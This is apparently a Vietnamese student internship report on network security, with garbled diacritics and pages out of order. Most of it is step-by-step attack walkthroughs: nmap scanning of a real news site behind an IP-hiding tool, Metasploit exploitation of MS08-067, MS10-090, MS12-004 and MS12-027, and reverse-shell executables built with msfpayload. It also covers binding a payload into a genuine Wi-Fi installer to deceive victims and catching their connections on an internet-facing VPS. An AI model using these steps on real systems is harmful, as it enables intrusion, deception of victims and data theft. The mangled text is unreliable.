việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
